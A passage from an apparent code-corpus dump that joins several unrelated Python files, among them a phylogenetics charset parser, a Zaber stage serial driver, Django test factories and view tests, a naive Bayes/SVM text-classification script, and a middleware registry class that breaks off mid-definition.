for j in range(self.nexusSets.aligNChar):
if ss.mask[j] == '1':
aSubset.mask[j] = '0'
else:
gm.append(
"CharPartition '%s' definition" % self.name)
gm.append("Subset '%s' definition" %
aSubset.name)
gm.append(
"When implementing 'remainder' charset")
gm.append(
"Found that subset '%s' had no mask" % ss)
raise P4Error(gm)
else:
gm.append("CharPartition '%s' definition" % self.name)
gm.append("Subset '%s' definition" % aSubset.name)
gm.append(
"Charset definition element '%s' is not understood" % first)
raise P4Error(gm)
elif first and second: # its a range
try:
start = int(first)
except ValueError:
gm.append("CharPartition '%s' definition" % self.name)
gm.append("Subset '%s' definition" % aSubset.name)
gm.append(
"Can't parse definition element '%s'" % first)
raise P4Error(gm)
if second == '.':
fin = len(aSubset.mask)
else:
try:
fin = int(second)
except ValueError:
gm.append(
"CharPartition '%s' definition" % self.name)
gm.append("Subset '%s' definition" % aSubset.name)
gm.append(
"Can't parse definition element '%s'" % second)
raise P4Error(gm)
if third:
try:
bystep = int(third)
except ValueError:
gm.append(
"CharPartition '%s' definition" % self.name)
gm.append("Subset '%s' definition" % aSubset.name)
gm.append(
"Can't parse definition element '%s'" % third)
for spot in range(start - 1, fin, bystep):
aSubset.mask[spot] = '1'
else:
for spot in range(start - 1, fin):
aSubset.mask[spot] = '1'
aSubset.mask = aSubset.mask.tostring()
# print "Got char subset '%s' mask '%s'" % (aSubset.name,
# aSubset.mask)
if aSubset.mask.count('1') == 0:
gm.append(
"The mask for charPartitionSubset '%s' is empty." % aSubset.name)
raise P4Error(gm)
def checkForOverlaps(self):
gm = ['CharPartition.checkForOverlaps()']
unspanned = 0
for i in range(self.nexusSets.aligNChar):
sum = 0
for aSubset in self.subsets:
if aSubset.mask[i] == '1':
sum += 1
if sum > 1:
gm.append("Char partition '%s'" % self.name)
gm.append(
"The problem is that there are overlapping subsets in this")
gm.append(
"charpartition. The same position is in more than one subset.")
gm.append(
"Zero-based position %i, one-based position %i." % (i, i + 1))
raise P4Error(gm)
if sum < 1:
unspanned = 1
if unspanned:
gm.append("Char partition '%s'" % self.name)
gm.append("You should be aware that this partition does not span")
gm.append("the entire sequence. Hopefully that is intentional.")
def dump(self):
print " CharPartition: name: %s" % func.nexusFixNameIfQuotesAreNeeded(self.name)
# string.join(self.tokens)
print " tokens: %s" % self.tokens
# for t in self.tokens:
# print " %s" % t
print " number of subsets: %s" % len(self.subsets)
for aSubset in self.subsets:
aSubset.dump()
def writeNexusToOpenFile(self, flob):
flob.write(' charPartition %s = ' % self.name)
# print " [ %s subsets ] " % len(self.subsets)
for aSubset in self.subsets[:-1]:
aSubset.writeNexusToOpenFile(flob)
flob.write(', ')
self.subsets[-1].writeNexusToOpenFile(flob)
flob.write(';\n')
def mask(self):
if not self.nexusSets.aligNChar:
self.nexusSets.aligNChar = self.theNexusSets.aligNChar
self.setSubsetMasks()
import array
m = array.array('c', self.nexusSets.aligNChar * '0')
for i in range(self.nexusSets.aligNChar):
for aSubset in self.subsets:
if aSubset.mask[i] == '1':
m[i] = '1'
return m.tostring()
| gpl-2.0 | 7,514,382,857,311,807,000 | 41.579559 | 123 | 0.453856 | false |
AndrewGYork/tools | zaber.py | 1 | 8750 | import time
import serial
class Stage:
"""Zaber stage(s), attached through the (USB?) serial port."""
def __init__(
self,
port_name, # For example, 'COM3' on Windows
timeout=1,
verbose=True,
very_verbose=False):
"""port_name: which serial port the stage is connected to, e.g. 'COM3'
"""
self.verbose = verbose
self.very_verbose = very_verbose
try:
self.serial = serial.Serial(
port=port_name,
baudrate=9600,
bytesize=8,
parity='N',
stopbits=1,
timeout=timeout)
except serial.serialutil.SerialException:
print('Failed to open serial port for Zaber stage(s).')
print('Sometimes Windows is weird about this!')
print('Consider trying again.')
raise
if self.verbose: print("Renumbering stages:")
self.devices = self.renumber_all_devices()
self.pending_moves = [False for d in self.devices]
if self.verbose:
for d in self.devices:
print(' Axis:', d)
print(' Done renumbering.')
self.restore_settings()
self.default_speed = min([r['speed'] for r in self.get_target_speed()])
if verbose: print(" Default stage speed:", self.default_speed)
self.move_home()
def send(self, instruction):
"""Send an instruction to the Zaber stage.
'instruction' must be a list of 6 integers, 0-255 (no error
checking).
See: http://www.zaber.com/wiki/Manuals/Binary_Protocol_Manual
for a list of instructions.
"""
assert len(instruction) == 6
if self.very_verbose: print("Sending to stage:", instruction)
serial_cmd = bytes(instruction) # 0 <= int(i) < 256 for i in instruction
self.serial.write(serial_cmd)
return None
def receive(self, expected_command_ID=None):
"""Return 6 bytes from the serial port
There must be 6 bytes to receive (no error checking).
"""
response = self.serial.read(6)
if len(response) != 6:
raise UserWarning(
"Zaber stage failed to respond. Is the timeout too short?\n" +
"Is the stage plugged in?")
response = {'device_number': response[0],
'command_ID': response[1],
'data': four_bytes_to_uint(response[2:6])}
if expected_command_ID is not None:
assert response['command_ID'] == expected_command_ID
if self.very_verbose:
print("Response from stage:\n", response)
return response
def get_position(self, axis='all'):
if axis == 'all':
axis = 0
num_responses = len(self.devices)
else:
num_responses = 1
assert axis in range(len(self.devices) + 1)
self.send([axis, 60, 0, 0, 0, 0])
responses = []
for i in range(num_responses):
responses.append(self.receive(expected_command_ID=60))
axis_positions = {}
for r in responses:
axis_positions[r['device_number']] = r['data']
return axis_positions
def move(self, distance, movetype='absolute', response=True, axis='all'):
distance = int(distance)
if self.verbose:
print("Moving axis: ", repr(axis),
" distance ", distance, " (", movetype, ")", sep='')
if axis == 'all':
axis = 0
assert self.pending_moves == [False for d in self.devices]
else:
assert axis in [d['device_number'] for d in self.devices]
assert self.pending_moves[(axis - 1)] == False
if movetype == 'absolute':
instruction = [axis, 20]
elif movetype == 'relative':
instruction = [axis, 21]
else:
raise UserWarning("Move type must be 'relative' or 'absolute'")
# Data conversion and transfer:
instruction.extend(uint_to_four_bytes(distance))
self.send(instruction)
if axis == 0:
self.pending_moves = [True for d in self.devices]
else:
self.pending_moves[axis - 1] = True
if response:
return self.finish_moving()
return None
def finish_moving(self):
response = []
for i in range(len(self.devices)):
if self.pending_moves[i]:
response.append(self.receive())
assert response[-1]['command_ID'] in (1, 20, 21)
self.pending_moves = [False for d in self.devices]
assert self.serial.inWaiting() == 0
return response
def move_home(self, response=True):
if self.verbose: print("Moving stage(s) near home...")
self.move(100)
if self.verbose: print("Moving stage(s) home.")
assert self.pending_moves == [False for d in self.devices]
self.send([0, 1, 0, 0, 0, 0])
self.pending_moves = [True for d in self.devices]
if response:
return self.finish_moving()
return None
def restore_settings(self):
if self.verbose: print("Restoring stage(s) to default settings.")
assert self.pending_moves == [False for d in self.devices]
assert self.serial.inWaiting() == 0
self.send([0, 36, 0, 0, 0, 0]) # Restore to default settings
for d in self.devices:
self.receive(expected_command_ID=36)
self.send([0, 116, 1, 0, 0, 0]) # Disable manual move tracking
for d in self.devices:
self.receive(expected_command_ID=116)
assert self.serial.inWaiting() == 0
return None
def renumber_all_devices(self):
self.serial.flushInput()
self.serial.flushOutput()
self.send([0, 2, 0, 0, 0, 0])
# We can't predict the length of the response, since we don't
# yet know how many stages there are. Just wait a healthy amount
# of time for the answer:
time.sleep(.8) # Seems to take a little over 0.5 seconds.
bytes_waiting = self.serial.inWaiting()
assert bytes_waiting % 6 == 0 # Each stage responds with 6 bytes.
num_stages = int(bytes_waiting / 6)
stages = []
for n in range(num_stages):
r = self.receive()
assert (r['device_number'] - 1) in range(num_stages)
assert r.pop('command_ID') == 2
r['device_ID'] = r.pop('data')
assert r['device_ID'] in (# List of devices we've tested; add liberally.
20053,
)
stages.append(r)
assert self.serial.inWaiting() == 0
return stages
def set_target_speed(self, speed, response=True):
min_speed = int(self.default_speed * 0.01)
max_speed = int(2*self.default_speed)
speed = int(speed)
assert min_speed <= speed < max_speed
if self.verbose: print("Setting stage speed to", speed)
inst = [0, 42]
inst.extend(uint_to_four_bytes(speed))
self.send(inst)
if response:
reply = [self.receive(expected_command_ID=42)
for d in self.devices]
return reply
def get_target_speed(self):
inst = [0, 53, 42, 0, 0, 0]
self.send(inst)
reply = []
for d in self.devices:
reply.append(self.receive())
assert reply[-1].pop('command_ID') == 42
reply[-1]['speed'] = reply[-1].pop('data')
return reply
def close(self):
self.move_home()
self.serial.close()
def four_bytes_to_uint(x):
assert len(x) == 4
return int.from_bytes(x, byteorder='little')
def uint_to_four_bytes(x):
assert 0 <= x < 4294967296
return [x >> i & 0xff for i in (0, 8, 16, 24)]
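# Worked example of the packing used by send()/receive() (values chosen for
# illustration): a "move absolute" to position 70000 on device 1 uses command 20,
# so the instruction is [1, 20] + uint_to_four_bytes(70000) == [1, 20, 112, 17, 1, 0],
# and four_bytes_to_uint(bytes([112, 17, 1, 0])) recovers 70000.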
if __name__ == '__main__':
my_stage = Stage(port_name='COM3', verbose=True, very_verbose=False)
try:
my_stage.move(0, movetype='absolute', axis='all')
for i in range(len(my_stage.devices)):
my_stage.move(70000, movetype='absolute', axis=i+1)
print("Stage postion:", my_stage.get_position())
my_stage.move(0, movetype='absolute', axis=i+1)
print("Stage postion:", my_stage.get_position())
my_stage.set_target_speed(my_stage.default_speed * 1.3)
my_stage.move(70000, movetype='absolute', axis='all')
print("Stage postion:", my_stage.get_position())
my_stage.move(0, movetype='absolute', axis='all')
print("Stage postion:", my_stage.get_position())
my_stage.set_target_speed(my_stage.default_speed)
finally:
my_stage.close()
| gpl-2.0 | 8,001,192,624,062,251,000 | 37.377193 | 84 | 0.56 | false |
jfunez/scielo-manager | scielomanager/journalmanager/tests/modelfactories.py | 1 | 7014 | # coding: utf-8
import factory
import datetime
from journalmanager import models
class ArticleFactory(factory.Factory):
FACTORY_FOR = models.Article
front = {
'default-language': 'en',
'title-group': {
'en': u'Article Title',
'pt': u'Título do Artigo',
}
}
xml_url = 'http://xml.url/'
pdf_url = 'http://pdf.url/'
images_url = 'http://img.url/'
class UserFactory(factory.Factory):
FACTORY_FOR = models.User
@classmethod
def _setup_next_sequence(cls):
try:
return cls._associated_class.objects.values_list(
'id', flat=True).order_by('-id')[0] + 1
except IndexError:
return 0
username = factory.Sequence(lambda n: "username%s" % n)
first_name = factory.Sequence(lambda n: "first_name%s" % n)
last_name = factory.Sequence(lambda n: "last_name%s" % n)
email = factory.Sequence(lambda n: "email%[email protected]" % n)
password = 'sha1$caffc$30d78063d8f2a5725f60bae2aca64e48804272c3'
is_staff = False
is_active = True
is_superuser = False
last_login = datetime.datetime(2000, 1, 1)
date_joined = datetime.datetime(1999, 1, 1)
class SubjectCategoryFactory(factory.Factory):
FACTORY_FOR = models.SubjectCategory
term = 'Acoustics'
class StudyAreaFactory(factory.Factory):
FACTORY_FOR = models.StudyArea
study_area = 'Health Sciences'
class SponsorFactory(factory.Factory):
FACTORY_FOR = models.Sponsor
name = u'Fundação de Amparo a Pesquisa do Estado de São Paulo'
address = u'Av. Professor Lineu Prestes, 338 Cidade Universitária \
Caixa Postal 8105 05508-900 São Paulo SP Brazil Tel. / Fax: +55 11 3091-3047'
email = '[email protected]'
complement = ''
class UseLicenseFactory(factory.Factory):
FACTORY_FOR = models.UseLicense
license_code = factory.Sequence(lambda n: 'CC BY-NC-SA%s' % n)
reference_url = u'http://creativecommons.org/licenses/by-nc-sa/3.0/deed.pt'
disclaimer = u'<a rel="license" href="http://creativecommons.org/licenses/by-nc-sa/3.0/"><img alt="Licença Creative Commons" style="border-width:0" src="http://i.creativecommons.org/l/by-nc-sa/3.0/88x31.png" /></a><br />Este trabalho foi licenciado com uma Licença <a rel="license" href="http://creativecommons.org/licenses/by-nc-sa/3.0/">Creative Commons - Atribuição - NãoComercial - CompartilhaIgual 3.0 Não Adaptada</a>.'
class CollectionFactory(factory.Factory):
FACTORY_FOR = models.Collection
url = u'http://www.scielo.br/'
name = factory.Sequence(lambda n: 'scielo%s' % n)
address_number = u'430'
country = u'Brasil'
address = u'Rua Machado Bittencourt'
email = u'[email protected]'
name_slug = factory.Sequence(lambda n: 'scl%s' % n)
class JournalFactory(factory.Factory):
FACTORY_FOR = models.Journal
ctrl_vocabulary = u'decs'
frequency = u'Q'
scielo_issn = u'print'
print_issn = factory.Sequence(lambda n: '1234-%04d' % int(n))
init_vol = u'1'
title = u'ABCD. Arquivos Brasileiros de Cirurgia Digestiva (São Paulo)'
title_iso = u'ABCD. Arquivos B. de C. D. (São Paulo)'
short_title = u'ABCD.(São Paulo)'
editorial_standard = u'vancouv'
secs_code = u'6633'
init_year = u'1986'
acronym = factory.Sequence(lambda n: 'ABCD%s' % int(n))
pub_level = u'CT'
    init_num = u'1'
subject_descriptors = u"""
MEDICINA
CIRURGIA
GASTROENTEROLOGIA
GASTROENTEROLOGIA""".strip()
pub_status = u'current'
pub_status_reason = u'Motivo da mudança é...'
publisher_name = u'Colégio Brasileiro de Cirurgia Digestiva'
publisher_country = u'BR'
publisher_state = u'SP'
publication_city = u'São Paulo'
editor_address = u'Av. Brigadeiro Luiz Antonio, 278 - 6° - Salas 10 e 11, 01318-901 São Paulo/SP Brasil, Tel. = (11) 3288-8174/3289-0741'
editor_email = u'[email protected]'
creator = factory.SubFactory(UserFactory)
pub_status_changed_by = factory.SubFactory(UserFactory)
use_license = factory.SubFactory(UseLicenseFactory)
collection = factory.SubFactory(CollectionFactory)
class SectionFactory(factory.Factory):
FACTORY_FOR = models.Section
code = factory.Sequence(lambda n: 'BJCE%s' % n)
journal = factory.SubFactory(JournalFactory)
class LanguageFactory(factory.Factory):
FACTORY_FOR = models.Language
iso_code = 'pt'
name = 'portuguese'
class IssueTitleFactory(factory.Factory):
"""
``issue`` must be provided
"""
FACTORY_FOR = models.IssueTitle
language = factory.SubFactory(LanguageFactory)
title = u'Bla'
class IssueFactory(factory.Factory):
FACTORY_FOR = models.Issue
total_documents = 16
number = factory.Sequence(lambda n: '%s' % n)
volume = factory.Sequence(lambda n: '%s' % n)
is_trashed = False
publication_start_month = 9
publication_end_month = 11
publication_year = 2012
is_marked_up = False
suppl_text = '1'
journal = factory.SubFactory(JournalFactory)
@classmethod
def _prepare(cls, create, **kwargs):
section = SectionFactory()
issue = super(IssueFactory, cls)._prepare(create, **kwargs)
issue.section.add(section)
return issue
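# Note: IssueFactory._prepare above attaches a freshly created Section to every Issue,
# so an illustrative IssueFactory() call also builds a Journal, a Collection and a Section.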
class UserProfileFactory(factory.Factory):
FACTORY_FOR = models.UserProfile
user = factory.SubFactory(UserFactory)
email = factory.Sequence(lambda n: 'email%[email protected]' % n)
class SectionTitleFactory(factory.Factory):
FACTORY_FOR = models.SectionTitle
title = u'Artigos Originais'
language = factory.SubFactory(LanguageFactory)
section = factory.SubFactory(SectionFactory)
class DataChangeEventFactory(factory.Factory):
FACTORY_FOR = models.DataChangeEvent
user = factory.SubFactory(UserFactory)
content_object = factory.SubFactory(JournalFactory)
collection = factory.SubFactory(CollectionFactory)
event_type = 'added'
class RegularPressReleaseFactory(factory.Factory):
FACTORY_FOR = models.RegularPressRelease
issue = factory.SubFactory(IssueFactory)
doi = factory.Sequence(lambda n: 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)
class AheadPressReleaseFactory(factory.Factory):
FACTORY_FOR = models.AheadPressRelease
journal = factory.SubFactory(JournalFactory)
doi = factory.Sequence(lambda n: 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)
class PressReleaseTranslationFactory(factory.Factory):
FACTORY_FOR = models.PressReleaseTranslation
language = factory.SubFactory(LanguageFactory)
press_release = factory.SubFactory(RegularPressReleaseFactory)
title = u'Yeah, this issue is amazing!'
content = u'Want to read more about...'
class PressReleaseArticleFactory(factory.Factory):
FACTORY_FOR = models.PressReleaseArticle
press_release = factory.SubFactory(RegularPressReleaseFactory)
article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)
| bsd-2-clause | 7,171,025,614,157,088,000 | 29.806167 | 429 | 0.680967 | false |
rbharvs/mnd-learning | supervised.py | 1 | 8636 | import sys
import parsetags
import numpy as np
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.feature_extraction.text import TfidfTransformer
from sklearn.naive_bayes import MultinomialNB
from sklearn import svm
from sklearn.decomposition import PCA as PCA
from mpl_toolkits.mplot3d import Axes3D
import matplotlib.pyplot as plt
import nltk
from nltk.stem import LancasterStemmer
import re
def get_top_tags(segment_tags, n):
tag_freqs = {}
for tag_list in segment_tags.values():
for tag in tag_list:
if tag not in tag_freqs:
tag_freqs[tag] = 0
tag_freqs[tag] += 1
return ['NULL'] + sorted(tag_freqs.keys(), key=lambda x: tag_freqs[x])[-n:]
def get_common_words(n=100):
try:
file_content = open(sys.argv[3]).read()
common_words = nltk.word_tokenize(file_content)
except IndexError:
return None
return set(common_words[:n])
def get_named_entities():
try:
file_content = open(sys.argv[2]).read()
named_entities = nltk.word_tokenize(file_content)
except IndexError:
return None
return set(named_entities)
def filter_segments(segment_tags, ntags):
filtered_segtags = {}
for segment in segment_tags:
# np.random.shuffle(segment_tags[segment])
for tag in segment_tags[segment]:
if tag not in ntags: continue
filtered_segtags[segment] = ntags.index(tag)
if segment not in filtered_segtags:
filtered_segtags[segment] = 0
return filtered_segtags
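# increase_num_segments oversamples the corpus: segments are drawn with probability
# proportional to their character length, then cropped to a random window of at most
# `length` characters, and each cropped segment keeps the tags of its source segment.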
def increase_num_segments(segment_tags, n, length=1000):
new_segment_tags = {}
segments = sorted(segment_tags.keys(), key=len)
lengths = np.array([len(seg) for seg in segments])
dist = lengths/np.sum(lengths)
random_segments = np.random.choice(segments, size=n, p=dist)
for segment in random_segments:
new_segment = segment
if len(new_segment) > length:
index = np.random.randint(0, len(new_segment)-length)
new_segment = new_segment[index:index+length]
new_segment_tags[new_segment] = segment_tags[segment]
return new_segment_tags
def named_entity_reduction(segment_tags, named_entities, common_words):
    punctuation = [',', '.', "'", '?', ';', ':', '!', '(', ')', '`', '--',
                   '\xe2', '\x80', '\x94', '\x99']
new_segments = []
segments = list(segment_tags.keys())
for segment in segments:
new_segment = ''
tokens = nltk.word_tokenize(segment)
for token in tokens:
if token in punctuation: continue
if token.lower() in common_words: continue
if token not in named_entities: continue
new_segment += token + ' '
new_segments.append(new_segment)
new_segment_tags = {}
for i in range(len(segments)):
new_segment_tags[new_segments[i]] = segment_tags[segments[i]]
return new_segment_tags
def stemming_reduction(segment_tags):
    punctuation = [',', '.', "'", '?', ';', ':', '!', '(', ')', '`', '--',
                   '\xe2', '\x80', '\x94', '\x99']
new_segments = []
stemmer = LancasterStemmer()
segments = list(segment_tags.keys())
for segment in segments:
new_segment = ''
segment = re.sub(r'[^\x00-\x7f]',r'', segment)
tokens = nltk.word_tokenize(segment)
for token in tokens:
if token in punctuation: continue
try:
new_segment += stemmer.stem(token)+' '
except UnicodeDecodeError:
new_segment += ''
new_segments.append(new_segment)
stemmed_segment_tags = {}
for i in range(len(segments)):
stemmed_segment_tags[new_segments[i]] = segment_tags[segments[i]]
return stemmed_segment_tags
def separate_segments(segment_tags, k):
train = {}
    for segment in list(segment_tags.keys()):  # copy keys so we can pop while iterating
if np.random.random() < k:
train[segment] = segment_tags.pop(segment)
return train, segment_tags
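# bag_of_words vectorizes the segment texts with scikit-learn's CountVectorizer and,
# when tfidf=True, rescales the counts with TfidfTransformer; the label vector is read
# from the segment -> tag-index mapping so rows of the matrix stay aligned with labels.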
def bag_of_words(segment_tags, tfidf=False):
#create matrix of word frequencies
segments = list(segment_tags.keys())
vec = CountVectorizer()
word_freqs = vec.fit_transform(segments).toarray()
if tfidf:
tfidf_transformer = TfidfTransformer()
word_freqs = tfidf_transformer.fit_transform(word_freqs)
labels = np.empty(shape=len(segments))
for i in range(len(segments)):
labels[i] = segment_tags[segments[i]]
return word_freqs, labels, segments
def entity_bow(segment_tags, named_entities, common_words):
    punctuation = [',', '.', "'", '?', ';', ':', '!', '(', ')', '`', '--',
                   '\xe2', '\x80', '\x94', '\x99']
new_segments = []
segments = list(segment_tags.keys())
for segment in segments:
new_segment = ''
tokens = nltk.word_tokenize(segment)
for token in tokens:
if token in punctuation: continue
if token.lower() in common_words: continue
if token not in named_entities: continue
new_segment += token + ' '
new_segments.append(new_segment)
vec = CountVectorizer()
word_freqs = vec.fit_transform(new_segments).toarray()
tfidf_transformer = TfidfTransformer()
X_train_tfidf = tfidf_transformer.fit_transform(word_freqs)
print(word_freqs.shape, X_train_tfidf.shape)
labels = np.empty(shape=len(segments))
for i in range(len(segments)):
labels[i] = segment_tags[segments[i]]
return X_train_tfidf, labels, segments
def pca_plot(Xtrain, ytrain):
#binary classification case
X_reduced = Xtrain
pca = PCA(3)
X_pca = pca.fit_transform(X_reduced)
ax = plt.axes(projection='3d')
for i in range(X_pca.shape[0]):
if ytrain[i] == 1:
ax.scatter(X_pca[i, 0], X_pca[i, 2], X_pca[i, 1], 'o', color='blue')
else:
ax.scatter(X_pca[i, 0], X_pca[i, 2], X_pca[i,1], 'x', color='red')
plt.show()
def randomize_order(X, y, segments):
shuffled_segments = []
indices = np.arange(len(segments))
np.random.shuffle(indices)
X, y = X[indices], y[indices]
for i in indices:
shuffled_segments.append(segments[i])
    return X, y, shuffled_segments
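# naive_bayes and support_vector below follow the same protocol: shuffle the examples,
# train on the first k fraction, test on the remainder, and return the error rate
# (1 - accuracy) on the held-out split.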
def naive_bayes(segment_tags, k=0.5, normalize=False):
X, y, segments = randomize_order(*bag_of_words(segment_tags, tfidf=normalize))
num_examples = len(segments)
Xtest, ytest = X[int(k*num_examples):, :], y[int(k*num_examples):]
Xtrain, ytrain = X[:int(k*num_examples), :], y[:int(k*num_examples)]
nb_classifier = MultinomialNB().fit(Xtrain, ytrain)
nb_predicted_tags = nb_classifier.predict(Xtest)
nb_success_rate = np.mean(nb_predicted_tags == ytest)
return 1-nb_success_rate
def support_vector(segment_tags, k=0.5, normalize=False):
X, y, segments = randomize_order(*bag_of_words(segment_tags, tfidf=normalize))
num_examples = len(segments)
Xtest, ytest = X[int(k*num_examples):, :], y[int(k*num_examples):]
Xtrain, ytrain = X[:int(k*num_examples), :], y[:int(k*num_examples)]
svm_classifier = svm.SVC()
svm_classifier.fit(Xtrain, ytrain)
svm_predicted_tags = svm_classifier.predict(Xtest)
svm_success_rate = np.mean(svm_predicted_tags == ytest)
return 1-svm_success_rate
if __name__ == "__main__":
orig_segment_tags = parsetags.parse_tags(sys.argv[1])
common_words = get_common_words()
named_entities = get_named_entities()
for sample_size in ['BIG']:
if sample_size == 'BIG':
segment_tags = increase_num_segments(orig_segment_tags, 3000, length=1000)
orig_segment_tags = segment_tags
for text_features in ['REGULAR', 'STEMMED', 'NAMED']:
if text_features == 'STEMMED':
segment_tags = stemming_reduction(orig_segment_tags)
if text_features == 'NAMED':
segment_tags = named_entity_reduction(orig_segment_tags, named_entities, common_words)
for freq_feature in ['COUNT', 'TFIDF']:
# ntags = get_top_tags(segment_tags, 7)
print(sample_size, text_features, freq_feature)
ntags = ['ETA', 'EHDRH', 'AFR']
filtered_segtags = filter_segments(segment_tags, ntags)
with open('Results/' + sample_size + '_' + text_features + '_' + freq_feature + '.txt', 'w') as f:
for i in range(100):
f.write(str(naive_bayes(filtered_segtags, normalize=(freq_feature is 'TFIDF'))) + '\n')
# segment_tags = parsetags.parse_tags(sys.argv[1])
# big_segment_tags = increase_num_segments(segment_tags, 3000, length=1000)
# ntags = get_top_tags(segment_tags, 7)
# for
# # ntags = ['NULL', 'ETA', 'EHDRH', 'AFR']
# common_words = get_common_words()
# named_entities = get_named_entities()
# filtered_segtags = filter_segments(segment_tags, ntags)
# #entity_bow(filtered_segtags, named_entities, common_words)
# naive_bayes(filtered_segtags, named_entities, common_words, features=entity_bow)
# naive_bayes(filtered_segtags)
# support_vector(filtered_segtags)
# predicted_tags = [ntags[int(np.round(nb_predicted_tags[i]))] for i in range(len(svm_predicted_tags))]
# count = 0
# print(ntags)
# for i in range(len(predicted_tags)):
# if predicted_tags[i] == 'NULL':
# if all(tag not in segment_tags[shuffled_segments[i]] for tag in ntags):
# count += 1
# else:
# if predicted_tags[i] in segment_tags[shuffled_segments[i]]:
# count += 1
# print(count/len(predicted_tags))
| mit | 4,742,825,620,163,231,000 | 33.544 | 104 | 0.683997 | false |
sburnett/seattle | seattlegeni/website/html/tests/ut_html_test_get_resources.py | 1 | 5863 | """
<Program>
test_get_resources.py
<Started>
8/30/2009
<Author>
Jason Chen
[email protected]
<Purpose>
Tests that the get_resources view function
handles normal operation and exceptions correctly.
<Notes>
See test_register.py for an explanation of our usage of the Django test client.
"""
#pragma out
# We import the testlib FIRST, as the test db settings
# need to be set before we import anything else.
from seattlegeni.tests import testlib
from seattlegeni.common.exceptions import *
from seattlegeni.website.control import interface
from seattlegeni.website.control import models
from django.contrib.auth.models import User as DjangoUser
# The django test client emulates a webclient, and returns what django
# considers the final rendered result (in HTML). This allows us to test the view
# functions in isolation.
from django.test.client import Client
# Declare our mock functions
def mock_get_logged_in_user(request):
geniuser = models.GeniUser(username='tester', password='password', email='[email protected]',
affiliation='test affil', user_pubkey='user_pubkey',
user_privkey='user_privkey', donor_pubkey='donor_pubkey',
usable_vessel_port='12345', free_vessel_credits=10)
return geniuser
def mock_acquire_vessels(geniuser, vesselcount, vesseltype):
return ['test1', 'test2']
def mock_acquire_vessels_throws_UnableToAcquireResourcesError(geniuser, vesselcount, vesseltype):
raise UnableToAcquireResourcesError
def mock_acquire_vessels_throws_InsufficientUserResourcesError(geniuser, vesselcount, vesseltype):
raise InsufficientUserResourcesError
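# The Django test client below drives the real URL routing and templates, while the
# interface-layer calls are replaced by the mock functions above inside each test.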
c = Client()
good_data = {'num':5, 'env':'rand'}
def main():
# Setup test environment
testlib.setup_test_environment()
testlib.setup_test_db()
try:
login_test_user()
test_normal()
test_interface_throws_UnableToAcquireResourcesError()
test_interface_throws_InsufficientUserResourcesError()
test_blank_POST_data()
test_invalid_POST_data_invalid_num()
test_invalid_POST_data_invalid_env()
print "All tests passed."
finally:
testlib.teardown_test_db()
testlib.teardown_test_environment()
def test_normal():
"""
<Purpose>
Test normal behavior
"""
interface.acquire_vessels = mock_acquire_vessels
response = c.post('/html/get_resources', good_data, follow=True)
assert(response.status_code == 200)
assert(response.template[0].name == 'control/myvessels.html')
def test_interface_throws_UnableToAcquireResourcesError():
"""
<Purpose>
Test behavior if interface throws UnableToAcquireResourcesError.
<Note>
    Checking only the existence of "action_summary" in the response
    is sufficient to see whether the view caught the error, since
error messages are shown in that html element. (Of course, so are
normal messages, but we are clearly having the interface throw an
exception, so normal messages don't even exist in this context).
"""
interface.acquire_vessels = mock_acquire_vessels_throws_UnableToAcquireResourcesError
response = c.post('/html/get_resources', good_data, follow=True)
assert(response.status_code == 200)
assert(response.template[0].name == 'control/myvessels.html')
assert("Unable to acquire vessels at this time" in response.content)
def test_interface_throws_InsufficientUserResourcesError():
"""
<Purpose>
Test behavior if interface throws InsufficientUserResourcesError.
"""
interface.acquire_vessels = mock_acquire_vessels_throws_InsufficientUserResourcesError
response = c.post('/html/get_resources', good_data, follow=True)
assert(response.status_code == 200)
assert(response.template[0].name == 'control/myvessels.html')
assert("Unable to acquire" in response.content)
assert("vessel credit" in response.content)
def test_blank_POST_data():
"""
<Purpose>
Test behavior if we submit blank POST data.
"""
interface.acquire_vessels = mock_acquire_vessels
response = c.post('/html/get_resources', {}, follow=True)
assert(response.status_code == 200)
assert(response.template[0].name == 'control/myvessels.html')
assert("This field is required" in response.content)
def test_invalid_POST_data_invalid_num():
"""
<Purpose>
Test behavior if we submit POST data with an invalid 'num' field.
"""
interface.acquire_vessels = mock_acquire_vessels
test_data = {'num':-5, 'env':'rand'}
response = c.post('/html/get_resources', test_data, follow=True)
assert(response.status_code == 200)
assert(response.template[0].name == 'control/myvessels.html')
assert("Select a valid choice" in response.content)
def test_invalid_POST_data_invalid_env():
"""
<Purpose>
Test behavior if we submit POST data with an invalid 'env' field.
"""
interface.acquire_vessels = mock_acquire_vessels
test_data = {'num':5, 'env':'notvalid'}
response = c.post('/html/get_resources', test_data, follow=True)
assert(response.status_code == 200)
assert(response.template[0].name == 'control/myvessels.html')
assert("Select a valid choice" in response.content)
# Creates a test user in the test db, and uses the test client to 'login',
# so all views that expect @login_required will now pass the login check.
def login_test_user():
# uses the mock get_logged_in_user function that represents a logged in user
interface.get_logged_in_user = mock_get_logged_in_user
user = DjangoUser.objects.create_user('tester', '[email protected]', 'testpassword')
user.save()
c.login(username='tester', password='testpassword')
if __name__=="__main__":
main() | mit | -4,059,790,173,869,409,300 | 29.196809 | 98 | 0.696572 | false |
daGrevis/squirrel | ware.py | 1 | 2640 | import inspect
class MiddlewareDuplicationError(Exception):
def __init__(self, middleware_name, middleware_names):
message = ("Middleware `{}` was already found in `{}` middlewares!"
.format(middleware_name, middleware_names))
super().__init__(message)
class MiddlewareMissingError(Exception):
def __init__(self, middleware_name, middleware_names):
message = ("Middleware `{}` wasn't found between `{}` middlewares!"
.format(middleware_name, middleware_names))
super().__init__(message)
class MiddlewareOrderError(Exception):
def __init__(self, middleware_name,
names_for_before_middlewares, names_for_after_middlewares):
message = ("Middleware `{}` can't be added before `{}` middlewares"
" and after `{}` middlewares!"
.format(middleware_name,
names_for_before_middlewares,
names_for_after_middlewares))
super().__init__(message)
class MiddlewareArgumentsError(Exception):
def __init__(self, middleware_name):
message = ("Middleware `{}` has wrong count of arguments!"
.format(middleware_name))
super().__init__(message)
class Ware(object):
    def __init__(self, middlewares=None):
        self.middlewares = list(middlewares) if middlewares else []
def get_names_for_middlewares(self):
return [name for name, _ in self.middlewares]
def add(self, middleware_name, middleware_callable):
if len((inspect.getfullargspec(middleware_callable)).args) != 1:
raise MiddlewareArgumentsError(middleware_name)
names_for_middlewares = self.get_names_for_middlewares()
if middleware_name in names_for_middlewares:
raise MiddlewareDuplicationError(middleware_name,
names_for_middlewares)
(self.middlewares).append((middleware_name, middleware_callable, ))
def remove(self, middleware_name):
